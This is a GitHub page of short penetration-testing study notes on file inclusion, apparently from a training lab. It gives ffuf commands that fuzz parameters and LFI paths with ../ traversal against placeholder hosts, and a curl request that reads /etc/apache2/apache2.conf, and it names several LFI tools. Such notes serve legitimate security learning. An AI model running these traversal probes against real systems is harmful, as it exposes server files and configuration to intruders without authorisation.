Fuzzing Parameters

Scan for parameters

ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287

Scan for LFI Common LFI Word List

ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287

Fuzzing Server Files

Server Webroot

Linux Windows

Tips Add few ../../../

ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287

Server Logs/ Configurations

Linux Windows SecLists-Jhaddix

ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287


curl http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/apache2/apache2.conf

Tools

LFISuite LFiFreak liffy

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

9.3 File Inclusion - tool.md

9.3 File Inclusion - tool.md

Fuzzing Parameters

Fuzzing Server Files

Server Webroot

Server Logs/ Configurations

Tools

Files

9.3 File Inclusion - tool.md

Latest commit

History

9.3 File Inclusion - tool.md

File metadata and controls

Fuzzing Parameters

Fuzzing Server Files

Server Webroot

Server Logs/ Configurations

Tools